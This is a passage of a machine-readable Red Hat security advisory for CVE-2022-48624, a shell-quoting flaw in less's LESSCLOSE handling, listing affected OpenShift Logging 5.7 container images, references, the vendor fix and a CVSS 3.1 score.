"text": "A flaw was found in less. The close_altfile() function in filename.c omits shell_quote calls for LESSCLOSE, a command line to invoke the optional input postprocessor. This issue could lead to an OS command injection vulnerability and arbitrary command execution on the host operating system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "less: missing quoting of shell metacharacters in LESSCLOSE handling",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this issue, an attacker needs the ability to influence the LESSCLOSE environment variable. This requirement makes this CVE a Moderate impact CVE.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-48624"
},
{
"category": "external",
"summary": "RHBZ#2265081",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2265081"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-48624",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48624"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-48624",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-48624"
}
],
"release_date": "2024-02-19T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-05-01T07:47:45+00:00",
"details": "For OpenShift Container Platform 4.11 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html\n\nFor Red Hat OpenShift Logging 5.7, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.12/logging/cluster-logging-upgrading.html",
"product_ids": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:2093"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
